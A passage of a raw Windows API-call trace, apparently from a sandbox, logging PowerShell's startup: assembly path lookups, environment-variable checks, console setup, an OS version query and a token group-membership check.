lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0028.132] GetLastError () returned 0x2 [0028.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0028.213] GetLastError () returned 0x2 [0028.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x24e5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0028.213] GetLastError () returned 0x2 [0028.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.238] GetLastError () returned 0xcb [0028.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e688, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.238] GetLastError () returned 0xcb [0028.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e638, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.239] GetLastError () returned 0xcb [0028.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e638, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.239] GetLastError () returned 0xcb [0028.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e638, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.247] GetLastError () returned 0xcb [0028.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", nBufferLength=0x105, lpBuffer=0x24e5cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config", lpFilePart=0x0) returned 0x3c [0028.295] GetLastError () returned 0x2 [0028.295] SetErrorMode (uMode=0x1) returned 0x1 [0028.295] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24ea74 | out: lpFileInformation=0x24ea74*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0028.295] GetLastError () returned 0x2 [0028.295] SetErrorMode (uMode=0x1) returned 0x1 [0028.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e688, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.433] GetLastError () returned 0x0 [0028.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e638, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.433] GetLastError () returned 0x0 [0028.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e638, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.434] GetLastError () returned 0x0 [0028.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.438] GetLastError () returned 0xcb [0028.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.440] GetLastError () returned 0xcb [0028.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.440] GetLastError () returned 0xcb [0028.443] CoCreateGuid (in: pguid=0x24eb54 | out: pguid=0x24eb54*(Data1=0xae513d48, Data2=0x27bd, Data3=0x4bd0, Data4=([0]=0x9c, [1]=0x9b, [2]=0x21, [3]=0x14, [4]=0x16, [5]=0x33, [6]=0xc2, [7]=0xda))) returned 0x0 [0028.452] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.452] GetLastError () returned 0xcb [0028.454] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.454] GetLastError () returned 0xcb [0028.455] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.455] GetLastError () returned 0xcb [0028.460] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0028.460] GetLastError () returned 0x0 [0028.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24ea34 | out: lpConsoleScreenBufferInfo=0x24ea34) returned 1 [0028.462] GetLastError () returned 0x0 [0028.465] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0028.465] GetLastError () returned 0x0 [0028.465] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24ea34 | out: lpConsoleScreenBufferInfo=0x24ea34) returned 1 [0028.465] GetLastError () returned 0x0 [0028.466] GetVersionExW (in: lpVersionInformation=0xd2648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd2648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0028.466] GetLastError () returned 0x0 [0028.467] GetCurrentProcess () returned 0xffffffff [0028.467] GetLastError () returned 0x3f0 [0028.468] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x24ea44 | out: TokenHandle=0x24ea44*=0x324) returned 1 [0028.468] GetLastError () returned 0x3f0 [0028.470] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24ea9c | out: TokenInformation=0x0, ReturnLength=0x24ea9c) returned 0 [0028.470] GetLastError () returned 0x7a [0028.471] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x974c0 [0028.471] GetLastError () returned 0x7a [0028.471] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x974c0, TokenInformationLength=0x4, ReturnLength=0x24ea9c | out: TokenInformation=0x974c0, ReturnLength=0x24ea9c) returned 1 [0028.471] GetLastError () returned 0x7a [0028.473] DuplicateTokenEx (in: hExistingToken=0x324, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24ea54 | out: phNewToken=0x24ea54*=0x31c) returned 1 [0028.473] GetLastError () returned 0x7f [0028.473] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24ea9c | out: TokenInformation=0x0, ReturnLength=0x24ea9c) returned 0 [0028.473] GetLastError () returned 0x7a [0028.473] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x974b0 [0028.473] GetLastError () returned 0x7a [0028.473] GetTokenInformation (in: TokenHandle=0x324, TokenInformationClass=0x8, TokenInformation=0x974b0, TokenInformationLength=0x4, ReturnLength=0x24ea9c | out: TokenInformation=0x974b0, ReturnLength=0x24ea9c) returned 1 [0028.474] GetLastError () returned 0x7a [0028.474] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x20353d4*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24ea30 | out: IsMember=0x24ea30) returned 1 [0028.474] GetLastError () returned 0x7a [0028.474] CloseHandle (hObject=0x31c) returned 1 [0028.474] GetLastError () returned 0x7a [0028.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.474] GetLastError () returned 0x7a [0028.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.474] GetLastError () returned 0x7a [0028.474] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.474] GetLastError () returned 0x7a [0028.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.475] GetLastError () returned 0x7a [0028.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.502] GetLastError () returned 0x7a [0028.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.502] GetLastError () returned 0x7a [0028.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.502] GetLastError () returned 0x7a [0028.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e574, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.502] GetLastError () returned 0x7a [0028.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.502] GetLastError () returned 0x7a [0028.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.503] GetLastError () returned 0x7a [0028.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e588, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.503] GetLastError () returned 0x7a [0028.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e538, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.503] GetLastError () returned 0x7a [0028.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e538, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.503] GetLastError () returned 0x7a [0028.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24e538, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0028.503] GetLastError () returned 0x7a [0028.549] SetConsoleCtrlHandler (HandlerRoutine=0x1c2384a, Add=1) returned 1 [0028.549] GetLastError () returned 0x7a [0028.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.575] GetLastError () returned 0xcb [0028.593] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c [0028.593] GetLastError () returned 0x0 [0028.595] CoCreateGuid (in: pguid=0x24ea68 | out: pguid=0x24ea68*(Data1=0xde24d4ee, Data2=0x9e05, Data3=0x4393, Data4=([0]=0xbc, [1]=0x9, [2]=0xa8, [3]=0x99, [4]=0x36, [5]=0x6d, [6]=0x5e, [7]=0xc2))) returned 0x0 [0028.624] WinSqmIsOptedIn () returned 0x0 [0028.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.624] GetLastError () returned 0xcb [0028.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.627] GetLastError () returned 0xcb [0028.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.627] GetLastError () returned 0xcb [0028.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.629] GetLastError () returned 0xcb [0028.630] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.630] GetLastError () returned 0xcb [0028.633] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.633] GetLastError () returned 0xcb [0028.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.634] GetLastError () returned 0xcb [0028.635] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.635] GetLastError () returned 0xcb [0028.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.638] GetLastError () returned 0xcb [0028.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.644] GetLastError () returned 0xcb [0028.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.644] GetLastError () returned 0xcb [0028.644] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xd2630, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.644] GetLastError () returned 0xcb [0028.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.866] GetLastError () returned 0xcb [0028.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.866] GetLastError () returned 0xcb [0028.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.866] GetLastError () returned 0xcb [0028.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.866] GetLastError () returned 0xcb [0028.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.910] GetLastError () returned 0x3 [0028.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.911] GetLastError () returned 0x3 [0028.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.911] GetLastError () returned 0x3 [0028.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.911] GetLastError () returned 0x3 [0028.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.911] GetLastError () returned 0x3 [0028.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.911] GetLastError () returned 0x3 [0028.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.911] GetLastError () returned 0x3 [0028.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.911] GetLastError () returned 0x3 [0028.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.911] GetLastError () returned 0x3 [0028.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0028.911] GetLastError () returned 0x3 [0028.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e270, lpFilePart=0x0 | out: 